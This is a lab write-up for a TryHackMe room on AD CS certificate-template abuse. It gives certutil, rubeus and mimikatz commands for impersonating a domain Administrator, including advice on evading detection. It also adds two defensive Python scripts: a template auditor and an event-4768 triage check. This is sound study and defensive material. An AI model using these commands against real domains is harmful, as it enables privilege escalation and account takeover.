Exploiting Certificates
Resources
Task 8 of TryHackMe Exploiting AD room
Certificate template concepts
Manage certificate templates
[MS-CRTD] Certificate Templates Structure
Certutil
PSPKIAudit
AD CS auditing
Further readings on AD Certificate exploitation (as a result of misconfigurations)
What is AD Certificate Services?
Microsoft's Public Key Infrastructure (PKI) implementation. It leverages the trust that Active Directory (AD) already provides within an organisation, which allows AD CS to act as a Certificate Authority (the PKI component that issues certificates) to prove and delegate trust.
Certificate templates
Certificate templates can greatly simplify the task of administering an Active Directory Certificate Services (AD CS) certification authority (CA) by allowing an administrator to issue certificates preconfigured for selected tasks.
Certificate templates are the sets of rules and settings that are configured on a CA to be applied against incoming certificate requests. Certificate templates also give instructions to the client on how to create and submit a valid certificate request.
Exploitation example
View the configured templates
C:\>certutil -Template -v > templates.txt
This command allows us to view all the configured certificate templates. The following tool can be used too
A combination of certain certificate parameter values (a misconfiguration) may allow us to exploit the certificate to perform privilege escalation. Refer to the link titled "Further readings on AD Certificate exploitation (as a result of misconfigurations)" under the resources section above for more information.
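To turn the template review above into a repeatable check, the following added example (not part of the original write-up or of any of the tools it links) parses a dump in the shape of certutil -Template -v and flags templates that combine the two properties this section relies on: the enrollee may supply the subject/SAN (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, bit 0x1 of msPKI-Certificate-Name-Flag) and the EKU set allows client authentication. It also reports whether CA manager approval (CT_FLAG_PEND_ALL_REQUESTS, bit 0x2 of msPKI-Enrollment-Flag) is required, since that mitigates the issue. The sample text is constructed and only approximates the real certutil layout; the property names and flag values are the documented ones.

```python
import re
from typing import Dict, List

# EKU OIDs that allow the issued certificate to be used for client (Kerberos PKINIT) logon.
CLIENT_AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag: requester controls subject/SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: CA manager approval required

# Constructed sample, modelled on the general shape of `certutil -Template -v` output
# (assumption: real output carries many more properties; only those parsed below matter).
SAMPLE_TEMPLATES = """\
Template[0]:
  TemplatePropCommonName = User
  TemplatePropEKUs =
    2 ObjectIds:
    1.3.6.1.5.5.7.3.2 Client Authentication
    1.3.6.1.5.5.7.3.4 Secure Email
  TemplatePropSubjectNameFlags = 0xa6000000 (2785017856)
  TemplatePropEnrollmentFlags = 0x29 (41)

Template[1]:
  TemplatePropCommonName = VulnTemplate
  TemplatePropEKUs =
    1 ObjectIds:
    1.3.6.1.5.5.7.3.2 Client Authentication
  TemplatePropSubjectNameFlags = 0x1 (1)
  TemplatePropEnrollmentFlags = 0x0 (0)

Template[2]:
  TemplatePropCommonName = ApprovedSAN
  TemplatePropEKUs =
    1 ObjectIds:
    1.3.6.1.4.1.311.20.2.2 Smart Card Logon
  TemplatePropSubjectNameFlags = 0x1 (1)
  TemplatePropEnrollmentFlags = 0x2 (2)

Template[3]:
  TemplatePropCommonName = WebServer
  TemplatePropEKUs =
    1 ObjectIds:
    1.3.6.1.5.5.7.3.1 Server Authentication
  TemplatePropSubjectNameFlags = 0x1 (1)
  TemplatePropEnrollmentFlags = 0x0 (0)
"""


def parse_templates(text: str) -> List[Dict]:
    """Split a certutil-style dump into per-template records with the fields we audit."""
    templates = []
    for block in re.split(r"^Template\[\d+\]:", text, flags=re.M)[1:]:
        name = re.search(r"TemplatePropCommonName\s*=\s*(\S+)", block)
        sn = re.search(r"TemplatePropSubjectNameFlags\s*=\s*(0x[0-9a-fA-F]+|\d+)", block)
        en = re.search(r"TemplatePropEnrollmentFlags\s*=\s*(0x[0-9a-fA-F]+|\d+)", block)
        # EKU OIDs are the dotted-number tokens at the start of a line (the "N ObjectIds:" count has no dot).
        ekus = re.findall(r"^\s*(\d+(?:\.\d+)+)\s", block, flags=re.M)
        templates.append({
            "name": name.group(1) if name else "?",
            "subject_name_flags": int(sn.group(1), 0) if sn else 0,
            "enrollment_flags": int(en.group(1), 0) if en else 0,
            "ekus": ekus,
        })
    return templates


def find_san_client_auth_templates(text: str) -> List[Dict]:
    """Return templates where the enrollee controls the subject/SAN and the cert can be used for client auth."""
    findings = []
    for t in parse_templates(text):
        enrollee_supplies_subject = bool(t["subject_name_flags"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
        # An empty EKU list means the certificate is valid for any purpose, including client auth.
        client_auth = not t["ekus"] or bool(set(t["ekus"]) & CLIENT_AUTH_EKUS)
        manager_approval = bool(t["enrollment_flags"] & CT_FLAG_PEND_ALL_REQUESTS)
        if enrollee_supplies_subject and client_auth:
            findings.append({"name": t["name"], "manager_approval": manager_approval})
    return findings


if __name__ == "__main__":
    for f in find_san_client_auth_templates(SAMPLE_TEMPLATES):
        status = "mitigated by manager approval" if f["manager_approval"] else "NO approval required"
        print(f"{f['name']}: enrollee-supplied SAN + client auth EKU ({status})")
```

Run against a real templates.txt by reading the file into the function; the fix for a flagged template is to remove the enrollee-supplies-subject flag or require manager approval, and to enrol only the groups that need the template. The remaining template properties that matter for the other variants in the linked reading (enrolment permissions, issuance requirements) are not covered here.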
Request a TGT using the newly retrieved certificate (to impersonate a particular user, e.g. Administrator)
Given that we are able to retrieve a certificate with parameters of our choice (User Principal Name (UPN), etc.), we can now use the certificate to request a TGT to impersonate a user with rubeus.exe:
Note: we can retrieve the certificate using the Microsoft Management Console (MMC).
The following attack works due to the permissions granted by the certificate template, particularly in this example the ability to specify the Subject Alternative Name (SAN) and to use the certificate for client authentication.
rubeus.exe asktgt /user:<user> /enctype:aes256 /certificate:<path_to_certificate> /password:<certificate_file_password> /outfile:<output_filename> /domain:<domain> /dc:<IP_of_DC>
/user: Username to impersonate. This value has to match the UPN specified in the certificate.
/enctype: Specifies the encryption type for the ticket. Setting a value for this field is important for evasion, since the default encryption algorithm is weak, which may result in an overpass-the-hash alert.
/certificate: Path to the certificate that was generated previously.
/password: Password for the certificate file.
/outfile: The file to output the TGT to.
/domain: The FQDN of the domain we are attacking.
/dc: The IP of the domain controller we are requesting the TGT from. It is best to select a DC that has a CA service running.
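The note on /enctype above is the attacker's view of a detection opportunity; the defender's counterpart is to watch the domain controller's Security event 4768 (a Kerberos TGT was requested). The following added example (not part of the original write-up) triages a constructed batch of 4768 data fields and flags TGTs issued with RC4-HMAC (TicketEncryptionType 0x17) and TGTs obtained with certificate pre-authentication (PreAuthType 16, PA-PK-AS-REQ, which also populates the certificate fields), with an extra marker when the target account is privileged. The field names are those of event 4768; the events themselves, the addresses and the privileged-account list are constructed.

```python
from typing import Dict, Iterable, List, Tuple

RC4_HMAC = 0x17    # TicketEncryptionType for RC4-HMAC, the weak default the /enctype note refers to
PA_PK_AS_REQ = 16  # PreAuthType for PKINIT (certificate-based) pre-authentication

# Constructed sample of the data fields of event 4768 (assumption: a real pipeline would
# pull these from the event XML; the values here are invented for the example).
SAMPLE_4768 = [
    {"TargetUserName": "alice", "IpAddress": "10.0.0.25", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "CertThumbprint": ""},
    {"TargetUserName": "Administrator", "IpAddress": "10.0.0.77", "PreAuthType": "16",
     "TicketEncryptionType": "0x17", "CertThumbprint": "<constructed-thumbprint-1>"},
    {"TargetUserName": "Administrator", "IpAddress": "10.0.0.77", "PreAuthType": "16",
     "TicketEncryptionType": "0x12", "CertThumbprint": "<constructed-thumbprint-2>"},
    {"TargetUserName": "bob", "IpAddress": "10.0.0.31", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "CertThumbprint": ""},
]


def triage_4768(events: Iterable[Dict[str, str]],
                privileged: Tuple[str, ...] = ("Administrator",)) -> List[Dict]:
    """Return one finding per suspicious TGT request, with the reasons it was flagged."""
    findings = []
    for e in events:
        reasons = []
        enc_type = int(e.get("TicketEncryptionType", "0x0"), 16)
        if enc_type == RC4_HMAC:
            reasons.append("rc4-tgt")
        if int(e.get("PreAuthType", "0")) == PA_PK_AS_REQ:
            reasons.append("pkinit")
            if e.get("TargetUserName") in privileged:
                reasons.append("pkinit-privileged")
        if reasons:
            findings.append({
                "user": e.get("TargetUserName"),
                "src": e.get("IpAddress"),
                "cert": e.get("CertThumbprint") or None,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in triage_4768(SAMPLE_4768):
        print(f"{f['user']} from {f['src']} cert={f['cert']} -> {', '.join(f['reasons'])}")
```

PKINIT logons are legitimate in environments that use smart cards, so the useful baseline is which accounts and source hosts normally authenticate with certificates; a privileged account suddenly doing PKINIT from a workstation, or any TGT still issued with RC4, is what this check surfaces for review.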
Next, we can load the TGT into memory with mimikatz:
mimikatz # privilege::debug
mimikatz # kerberos::ptt <TGT_file_location>.kirbi
mimikatz # exit
Test the validity of our TGT against the target
Given that we have crafted a TGT for the Administrator on the DC named DC.TEST.COM, we can now attempt to view the directory listing on that machine:
C:\> dir \\DC.TEST.COM\C$
We can confirm that our TGT is working if we are able to view the directory listing.
Note
This attack variant works due to certain parameter value misconfigurations in the certificate template. Check out the link titled "Further readings on AD Certificate exploitation (as a result of misconfigurations)" under the resources section above for more information on the different attack variants.